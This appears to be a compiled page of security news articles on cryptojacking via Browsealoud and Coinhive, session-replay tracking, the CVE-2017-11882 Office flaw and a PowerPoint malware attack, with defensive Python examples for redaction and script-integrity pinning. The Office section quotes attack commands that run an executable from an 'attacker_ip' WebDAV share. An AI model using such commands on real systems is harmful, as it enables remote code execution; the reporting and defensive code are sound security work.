
Thousands of Government Websites Hacked to Mine Cryptocurrencies


There was a time when hackers simply defaced websites to get attention; then they started hijacking them to spread banking trojans and ransomware, and now the trend has shifted towards injecting scripts into sites to mine cryptocurrencies.

Thousands of government websites around the world have been found infected with a specific script that secretly forces visitors’ computers to mine cryptocurrency for attackers.

The cryptocurrency-mining script injection was found on over 4,000 websites, including those belonging to the UK’s National Health Service (NHS), the Student Loans Company and the data protection watchdog Information Commissioner’s Office (ICO), Queensland legislation, as well as the US government’s court system.

Users who visited the hacked websites immediately had their computers’ processing power hijacked, also known as cryptojacking, to mine cryptocurrency without their knowledge, potentially generating profits for the unknown hacker or group of hackers.

It turns out that hackers managed to hijack a popular third-party accessibility plugin called “Browsealoud,” used by all these affected websites, and injected their cryptocurrency-mining script into its code.

Browsealoud is a popular third-party browser plugin that helps blind and partially-sighted users access the web by converting site text to audio.

The script that was inserted into the compromised Browsealoud software belongs to CoinHive—a browser-based Monero mining service that lets website administrators earn revenue by using the CPU resources of their visitors.

The mining software was found in more than 4,200 websites, including The City University of New York (cuny.edu), Uncle Sam’s court information portal (uscourts.gov), the UK’s Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner’s Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), UK NHS services, Manchester.gov.uk, NHSinform.scot, agriculture.gov.ie, Croydon.gov.uk, ouh.nhs.uk, legislation.qld.gov.au, the list goes on.

The full list of affected websites can be found here.

After UK-based infosec consultant Scott Helme raised the alarm about this hack when one of his friends mentioned getting anti-virus alerts on a UK Government website, BrowseAloud’s operator Texthelp took down its site to resolve the issue.

Here’s what Texthelp’s chief technology officer Martin McKay said in a blog post:

“In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year. Our data security action plan was actioned straight away and was effective, the risk was mitigated for all customers within a period of four hours.”

“Texthelp has in place continuously automated security tests for Browsealoud – these tests detected the modified file, and as a result, the product was taken offline.”

Taking the product offline removed Browsealoud from all customer websites at once, addressing the security issue without its customers having to take any action.

The company also assured that “no customer data has been accessed or lost,” and that its customers will receive a further update as soon as the security investigation gets completed.

Russian Scientists Arrested for Using Nuclear Weapon Facility to Mine Bitcoins


Two days ago, when infosec bods claimed to have uncovered what is believed to be the first case of a SCADA network (a water utility) infected with cryptocurrency-mining malware, some journalists accused other authors of writing fear-mongering headlines, joking that the next headline would be about a cryptocurrency miner detected in a nuclear plant.

It seems they now have to run such a story themselves, because the Russian Interfax News Agency yesterday reported that several scientists at Russia’s top nuclear research facility had been arrested for mining cryptocurrency with “office computing resources.”

The suspects work as engineers at the Russian Federation Nuclear Center facility—also known as the All-Russian Research Institute of Experimental Physics—which works on developing nuclear weapons.

The center is located in Sarov, which is still a restricted area with high security and is also the birthplace of the Soviet Union’s first nuclear bomb.

In 2011, the Russian Federation Nuclear Center switched on a new supercomputer with a capacity of 1 petaflop, making it the twelfth most powerful in the world at the time.

According to Russian media reports, the engineers had tried to use one of Russia’s most powerful supercomputers housed in the Federal Nuclear Center to mine Bitcoins.

The suspects were caught red-handed while attempting to connect the lab’s supercomputer to the internet; the machine was supposed to stay offline for security reasons, and the attempt alerted the nuclear center’s security department.

Once caught, the engineers were handed over to the Federal Security Service (FSB).

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency. 

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them,” Zalesskaya added, without revealing the exact number of employees detained.

The Federal Security Service (FSB) has yet to issue a statement on the arrests and criminal charges.

Cryptocurrency has gained tremendous popularity over the past year. Mining a single Bitcoin is not a cakewalk, as it requires an enormous amount of computational power and huge amounts of energy.

According to media reports, Russia is becoming a hotbed of cryptocurrency mining due to its low-cost energy reserves. One Russian businessman, Alexey Kolesnik, reportedly also bought two power stations exclusively to generate electricity for Bitcoin-mining data centers.

Over 400 Popular Sites Record Your Every Keystroke and Mouse Movement


How many times has it happened to you that you look for something online and the next moment you find its advertisement on almost every other web page or social media site you visit?

Web-tracking is not new.

Most websites log their users’ online activities, but a recent study from Princeton University has suggested that hundreds of sites record your every move online, including your searches, scrolling behavior, keystrokes and mouse movements.

Researchers from Princeton University’s Centre for Information Technology Policy (CITP) analyzed the Alexa top 50,000 websites in the world and found that 482 sites, many of which are high profile, are using a new web-tracking technique to track every move of their users.

Dubbed “Session Replay,” the technique is used even by the most popular websites, including The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, and WordPress, to record every single movement a visitor makes while navigating a web page, and this incredibly extensive data is then sent off to a third party for analysis.

“Session replay scripts” are usually designed to gather data regarding user engagement that can be used by website developers to improve the end-user experience.

However, what’s particularly concerning is that these scripts record beyond the information you purposely give to a website—which also includes the text you type while filling in a form and then delete before hitting ‘Submit.’

“More and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behaviour, along with the entire contents of the pages you visit, and send them to third-party servers,” Princeton researcher Steven Englehardt wrote in a blog post under the No Boundaries banner.

“Collection of page content by third-party replay scripts may cause sensitive information such as medical conditions, credit card details and other personal information displayed on a page to leak to the third party as part of the recording. This may expose users to identity theft, online scams, and other unwanted behaviour.”

The most troubling part is that the information collected by session replay scripts cannot “reasonably be expected to be kept anonymous.” Some of the companies that provide session replay software even allow website owners to explicitly link recordings to a user’s real identity.

Services Offering Session Replay Could Capture Your Passwords

The researchers looked at some of the leading companies, including FullStory, SessionCam, Clicktale, Smartlook, UserReplay, Hotjar, and Yandex, which offer session replay software services, and found that most of these services directly exclude password input fields from recording.

However, in most cases mobile-friendly login forms that use plain text inputs to hold unmasked passwords are not redacted in the recordings, which ends up revealing your sensitive data, including passwords, credit card numbers, and even credit card security codes.

This data is then shared with a third party for analysis, along with other gathered information.

“We found at least one website where the password entered into a registration form leaked to SessionCam, even if the form is never submitted,” the researcher said.
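The gap the researchers describe above is a redaction rule that keys only on the input type: a password typed into a mobile form rendered as `type="text"` sails through, as does a card number typed into a free-text field. The following Python is an added example, not code from Princeton, from any of the replay vendors or from the affected sites. It models a server-side filter that a site operator could run over captured form events before they leave the origin, redacting by input type, by field name and by card-number shape (Luhn check on embedded digit runs). The event records are constructed samples.

```python
import re

# Field names that should never reach a replay backend, whatever the input type.
# Over-matching (e.g. a field called "discard") is the safe direction here.
SENSITIVE_NAME_RE = re.compile(r"pass|pwd|secret|token|cvv|cvc|card|ccnum", re.IGNORECASE)
# A run of 13-19 digits, optionally separated by spaces or dashes, inside any text.
CARD_RUN_RE = re.compile(r"(?:\d[ -]?){13,19}")
MASK = "[redacted]"


def luhn_valid(digits: str) -> bool:
    """True if a 13-19 digit string passes the Luhn checksum (card-number shape)."""
    if not digits.isdigit() or not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def contains_card_number(value: str) -> bool:
    """Scan free text for any digit run that checks out as a card number."""
    for match in CARD_RUN_RE.finditer(value):
        compact = re.sub(r"[ -]", "", match.group(0))
        if luhn_valid(compact):
            return True
    return False


def is_sensitive(event: dict) -> bool:
    """Apply all three rules; the type rule alone is what the vendors relied on."""
    if event.get("type", "").lower() == "password":
        return True
    if SENSITIVE_NAME_RE.search(event.get("name", "")):
        return True
    return contains_card_number(event.get("value", ""))


def redact_event(event: dict) -> dict:
    """Return a copy of the event with the value masked when it is sensitive."""
    out = dict(event)
    if is_sensitive(event):
        out["value"] = MASK
    return out


def redact_stream(events: list) -> list:
    return [redact_event(e) for e in events]


# Constructed sample of keystroke-capture events as a replay script might emit them.
SAMPLE_EVENTS = [
    {"name": "q", "type": "search", "value": "running shoes"},
    {"name": "password", "type": "password", "value": "hunter2"},
    {"name": "password", "type": "text", "value": "hunter2"},  # mobile form, unmasked input
    {"name": "card_number", "type": "tel", "value": "4111 1111 1111 1111"},
    {"name": "comment", "type": "text", "value": "4111 1111 1111 1111 is my card"},
    {"name": "dob", "type": "text", "value": "2018-11-20"},
]

if __name__ == "__main__":
    for event in redact_stream(SAMPLE_EVENTS):
        print(f'{event["name"]:12} {event["type"]:9} {event["value"]}')
```

The third and fifth sample events are the ones a type-only rule misses; the filter catches them by field name and by digit-run shape respectively, while the date of birth, whose digits do not form a Luhn-valid run, is left alone. Redaction at the origin is the only place where the site operator, rather than the replay vendor, controls what leaves the page.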

The researchers also shared a video which shows how much detail these session recording scripts can collect on a website’s visitor.

World’s Top Websites Record Your Every Keystroke

Many significant firms use session replay scripts with the best of intentions, but since this data is collected without the user’s knowledge or any visual indication to the user, these websites are disregarding their users’ privacy.

Also, there is always potential for such data to fall into the wrong hands.

Besides the fact that this practice is happening without people’s knowledge, the people in charge of some of the websites also did not even know that the script was implemented, which makes the matter a little scary.

Companies using such software included The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, WordPress, CBS News, the Telegraph, and US retail giant Home Depot, among many others.

So, if you log in to one of these websites, you should expect that everything you write, type, or move is being recorded.

17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction


You should be extra careful when opening files in MS Office.

When the world is still dealing with the threat of ‘unpatched’ Microsoft Office’s built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.


However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

DEMO: Exploitation Allows Full System Take Over

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:

“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it).”

“One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker.”

“Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient.”

“After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service.”

Protection Against Microsoft Office Vulnerability

With this month’s Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply the November security patches as soon as possible to prevent hackers and cybercriminals from taking control of their computers.

Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.

Users can run the following command in an elevated command prompt to disable the component through its COM Compatibility entry in the Windows registry (the backslashes in the key path are required; the quotes must be plain ASCII quotes):

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For a 32-bit Microsoft Office package on an x64 OS, run the following command instead, which targets the Wow6432Node view of the registry:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Hacker Hijacks CoinHive’s DNS to Mine Cryptocurrency Using Thousands of Websites


Yesterday, when I was reporting on the sudden outbreak of another global ransomware attack, ‘Bad Rabbit,’ I thought: what could be worse than this?

Then late last night I got my answer, with a notification that Coinhive has been hacked — a popular browser-based service that lets website owners embed a JavaScript snippet that uses their site visitors’ CPU power to mine the Monero cryptocurrency for monetisation.

Reportedly an unknown hacker managed to hijack Coinhive’s CloudFlare account that allowed him/her to modify its DNS servers and replace Coinhive’s official JavaScript code embedded into thousands of websites with a malicious version.

https://coin-hive[.]com/lib/coinhive.min.js

Hacker Reused Leaked Password from 2014 Data Breach

Apparently, the hacker reused an old password to access Coinhive’s CloudFlare account, one that had been leaked in the Kickstarter data breach in 2014.

“Tonight, Oct. 23rd at around 22:00 GMT our account for our DNS provider (Cloudflare) has been accessed by an attacker. The DNS records for coinhive.com have been manipulated to redirect requests for the coinhive.min.js to a third party server,” Coinhive said in a blog post today.

“This third-party server hosted a modified version of the JavaScript file with a hardcoded site key.”

As a result, thousands of sites using the Coinhive script were tricked for at least six hours into loading modified code that mined Monero cryptocurrency for the hacker rather than for the actual site owners.

“We have learned hard lessons about security and used 2FA [Two-factor authentication] and unique passwords for all services since, but we neglected to update our years old Cloudflare account.”
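Both the Browsealoud compromise reported earlier on this page and the Coinhive DNS hijack described in this section worked the same way: the affected sites loaded a third-party script by URL and ran whatever the server (or whoever controlled its DNS) returned. Subresource Integrity (SRI) is the browser mechanism that pins the expected hash of such a script in the `integrity` attribute, so a modified copy is refused before it runs. The following Python is an added example and not code from Texthelp, Coinhive, Cloudflare or any affected site; it computes the integrity value, emits the script tag, and performs the same comparison a browser does. The two script bodies are constructed samples, the tampered one standing in for an injected loader.

```python
import base64
import hashlib
import hmac
import html

# Hash algorithms the SRI specification allows in the integrity attribute.
SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI token, e.g. 'sha384-<base64 digest>', for the given bytes."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Simplified browser-side check: the resource passes if any listed token
    whose algorithm is known matches the digest of the bytes actually fetched.
    Tokens with unknown algorithms are ignored, as the specification requires."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo not in SRI_ALGOS:
            continue
        if hmac.compare_digest(sri_hash(content, algo), token):
            return True
    return False


def script_tag(src: str, content: bytes, algo: str = "sha384") -> str:
    """Emit the <script> tag a site would embed for a pinned third-party file.
    crossorigin="anonymous" is required for SRI on cross-origin scripts."""
    return (
        f'<script src="{html.escape(src, quote=True)}" '
        f'integrity="{sri_hash(content, algo)}" crossorigin="anonymous"></script>'
    )


# Constructed samples: the script as reviewed, and the same script with extra
# code appended (standing in for an injected miner loader).
ORIGINAL_JS = b"window.accessibility = function () { return 'speak'; };\n"
TAMPERED_JS = ORIGINAL_JS + b"// constructed stand-in for injected code\n"

if __name__ == "__main__":
    tag = script_tag("https://cdn.example.test/plugin/plugin.min.js", ORIGINAL_JS)
    pinned = sri_hash(ORIGINAL_JS)
    print(tag)
    print("original passes:", verify_sri(ORIGINAL_JS, pinned))
    print("tampered passes:", verify_sri(TAMPERED_JS, pinned))
```

The trade-off is that SRI only works when the URL serves a fixed, reviewed version: a plugin that updates itself in place, as Browsealoud did, or a loader that fetches further code at runtime, breaks the pin or escapes it. In those cases the practical options are a vendor-provided versioned URL, or self-hosting a reviewed copy, plus a Content Security Policy that limits which origins may supply scripts at all.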

Your Web-Browsers Could Be Mining Cryptocurrencies Secretly for Strangers

Coinhive gained media attention in recent weeks after the popular torrent download website The Pirate Bay was caught secretly using this browser-based cryptocurrency miner on its site.

Immediately after that, thousands of other websites also started using Coinhive as an alternative monetisation model, using their visitors’ CPU processing power to mine digital currencies.

Hackers are also using Coinhive-like services to make money from compromised websites by secretly injecting the script.

Well, now the company is also looking for ways to reimburse its users for the revenue lost due to the breach.

How to Block Websites From Hijacking Your CPU to Mine Cryptocoins

Due to concerns mentioned above, some Antivirus products, including Malwarebytes and Kaspersky, have also started blocking Coinhive script to prevent their customers from unauthorised mining and extensive CPU usage.

You can also install No Coin or minerBlock, small open-source browser extensions (plug-ins) that block coin miners such as Coinhive.

Enable Google’s New “Advanced Protection” If You Don’t Want to Get Hacked


It is good to be paranoid when it comes to cybersecurity.

Google already provides various advanced features such as login alerts and two-factor authentication to keep your Google account secure.

However, if you are extra paranoid, Google has just introduced its strongest ever security feature, called “Advanced Protection,” which makes it easier for users, who are usually at high risk of targeted online attacks, to lock down their Google accounts like never before.

“We took this unusual step because there is an overlooked minority of our users that are at particularly high risk of targeted online attacks,” the company said in a blog post announcing the program on Tuesday. 

“For example, these might be campaign staffers preparing for an upcoming election, journalists who need to protect the confidentiality of their sources, or people in abusive relationships seeking safety.”

Even if a hacker somehow gets your password—using advanced phishing attacks, zero-day exploits or spyware—and tries to access your Google account, they will not be able to get in.

To enable Google’s Advanced Protection feature, you will need two physical security keys that work with FIDO Universal 2nd Factor (U2F)—which offers a hardware-based two-factor authentication that does not require secret codes via SMS or emails.


Logging into your Google account from a computer or laptop requires a special USB stick, while accessing it from a smartphone or tablet requires a Bluetooth-enabled dongle paired with your phone.

“They [security devices] use public-key cryptography and digital signatures to prove to Google that it’s really you,” the post reads. “An attacker who does not have your Security Key is automatically blocked, even if they have your password.”

Google’s Advanced Protection offers three features to keep your account safe:

  1. Physical Security Key: Signing into your account requires a U2F security key, preventing other people (even with access to your password) from logging into your account.
  2. Limit data access and sharing: Enabling this feature allows only Google apps to get access to your account for now, though other trusted apps will be added over time.
  3. Blocking fraudulent account access: If you lose your U2F security key, the account recovery process will involve additional steps, “including additional reviews and requests for more details about why you’ve lost access to your account” to prevent fraudulent account access.

Advanced Protection feature is not designed for everyone, but only for people, like journalists, government officials and activists, who are at a higher risk of being targeted by government or sophisticated hackers and ready to sacrifice some convenience for substantially increased e-mail protection.

Currently, if you want to enrol in the Advanced Protection Program, you will need Google Chrome, since only Chrome supports the U2F standard for Security Keys. However, other browsers are expected to incorporate this feature soon.

Google Adds ESET Malware Detection to Chrome


Google has also made a notable change by partnering with anti-virus software firm ESET to expand the scope of malware detection and protection in its browser through the Chrome Cleanup feature.

Chrome Cleanup now has a malware detection engine from ESET, which works in tandem with Chrome’s sandbox technology.

“We can now detect and remove more unwanted software than ever before, meaning more people can benefit from Chrome Cleanup,” Google said in a blog post published Monday. 

“Note this new sandboxed engine is not a general-purpose antivirus—it only removes software that doesn’t comply with our unwanted software policy.”

You can sign up for Google’s Advanced Protection here.

CVE-2017-9801


CVEdetails.com the ultimate security vulnerability data source

When a call-site passes a subject for an email that contains line-breaks in Apache Commons Email 1.0 through 1.4, the caller can add arbitrary SMTP headers.

Publish Date: 2017-08-07. Last Update Date: 2017-08-09.


CVSS Scores & Vulnerability Types

CVSS Score: 5.0
Confidentiality Impact: None (There is no impact to the confidentiality of the system.)
Integrity Impact: Partial (Modification of some system files or information is possible, but the attacker does not have control over what can be modified, or the scope of what the attacker can affect is limited.)
Availability Impact: None (There is no impact to the availability of the system.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit.)
Authentication: Not required (Authentication is not required to exploit the vulnerability.)
Gained Access: None
Vulnerability Type(s): (none listed)
CWE ID: 20





Beware! This Microsoft PowerPoint Hack Installs Malware Without Requiring Macros


Disable macros, and always be extra careful when you manually enable them while opening Microsoft Office Word documents.

You have probably seen the above security warning many times on the Internet, as hackers usually leverage this decade-old macro-based hacking technique to compromise computers through specially crafted Microsoft Office files, particularly Word documents, attached to spam emails.

But a new social engineering attack has been discovered in the wild, which doesn’t require users to enable macros; instead it executes malware on a targeted system using PowerShell commands embedded inside a PowerPoint (PPT) file.

Moreover, the malicious PowerShell code hidden inside the document triggers as soon as the victim moves/hovers a mouse over a link (as shown), which downloads an additional payload on the compromised machine — even without clicking it.

Researchers at security firm SentinelOne have discovered that a group of hackers is using malicious PowerPoint files to distribute ‘Zusy,’ a banking Trojan also known as ‘Tinba’ (Tiny Banker).

Discovered in 2012, Zusy is a banking trojan that targets financial websites and has the ability to sniff network traffic and perform Man-in-The-Browser attacks in order to inject additional forms into legit banking sites, asking victims to share more crucial data such as credit card numbers, TANs, and authentication tokens.

“A new variant of a malware called ‘Zusy’ has been found in the wild spreading as a PowerPoint file attached to spam emails with titles like ‘Purchase Order #130527’ and ‘Confirmation.’ It’s interesting because it doesn’t require the user to enable macros to execute,” researchers at SentinelOne Labs say in a blog post.

The PowerPoint files have been distributed through spam emails with subjects like “Purchase Order” and “Confirmation,” which when opened, displays the text “Loading…Please Wait” as a hyperlink.


When a user hovers the mouse over the link, it automatically tries to trigger the PowerShell code, but the Protected View security feature that comes enabled by default in most supported versions of Office, including Office 2013 and Office 2010, displays a severe warning and prompts the user to enable or disable the content.

If the user neglects this warning and allows the content to be viewed, the malicious program will connect to the “cccn.nl” domain name, from where it downloads and executes a file, which is eventually responsible for the delivery of a new variant of the banking Trojan called Zusy.

“Users might still somehow enable external programs because they’re lazy, in a hurry, or they’re only used to blocking macros,” SentinelOne Labs says. “Also, some configurations may possibly be more permissive in executing external programs than they are with macros.”

Another security researcher, Ruben Daniel Dodge, also analyzed this attack and confirmed that it does not rely on macros, JavaScript or VBA for its execution method.

“This is accomplished by an element definition for a hover action. This hover action is setup to execute a program in PowerPoint once the user mouses over the text. In the resources definition of slide1 ‘rID2’ is defined as a hyperlink where the target is a PowerShell command,” Dodge said.

The security firm also said that the attack doesn’t work if the malicious file is opened in PowerPoint Viewer, which refuses to execute the program. But the technique could still be efficient in some cases.
